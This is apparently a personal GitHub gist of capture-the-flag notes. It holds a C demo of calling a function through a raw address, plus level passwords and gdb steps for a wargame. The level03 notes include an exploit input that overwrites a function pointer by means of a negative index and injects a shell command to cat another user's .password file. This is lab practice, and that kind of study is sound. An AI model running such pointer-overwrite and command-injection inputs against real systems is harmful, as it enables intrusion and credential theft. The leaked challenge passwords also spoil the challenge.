Created
September 26, 2018 03:34
-
-
Save bmcculley/0adcb0cf513102e828a39f570327d325 to your computer and use it in GitHub Desktop.
Cheat sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <ctype.h> | |
void run() { | |
system("whoami"); | |
} | |
int main(int argc, char const *argv[]) | |
{ | |
printf("Address: %p\n", run); | |
// this will call run(); | |
// compile and use gdb to get the address of run | |
// gdb ./a.out | |
// (gdb) print run | |
// put that address in place of "<address>" recompile and run | |
/* | |
int (*func)(void) = (int (*)(void))<address>; | |
func(); | |
*/ | |
return 0; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
level00 | |
pass: izeecahd | |
level01 | |
pass: aepeefoo | |
level02 | |
pass: quemaosh | |
level03 | |
run address: | |
0x804879b | |
run 0 abcd | |
x/64xb buf | |
print fns | |
print &buf | |
print (fns - buf) / 4 | |
27 | |
run -27 "`echo -e "\x9b\x87\x04\x08"`" | |
run -27 "`echo -e "cat /home/level03/.password;#\x9b\x87\x04\x08"`" | |
run -20 "`echo -e "cat /home/level03/.password;\x9b\x87\x04\x08"`" | |
pass: eingaima |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment